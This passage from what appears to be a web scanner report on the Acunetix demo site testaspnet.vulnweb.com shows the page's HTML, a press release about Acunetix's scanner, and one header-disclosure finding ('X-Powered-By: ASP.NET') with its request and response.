AgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 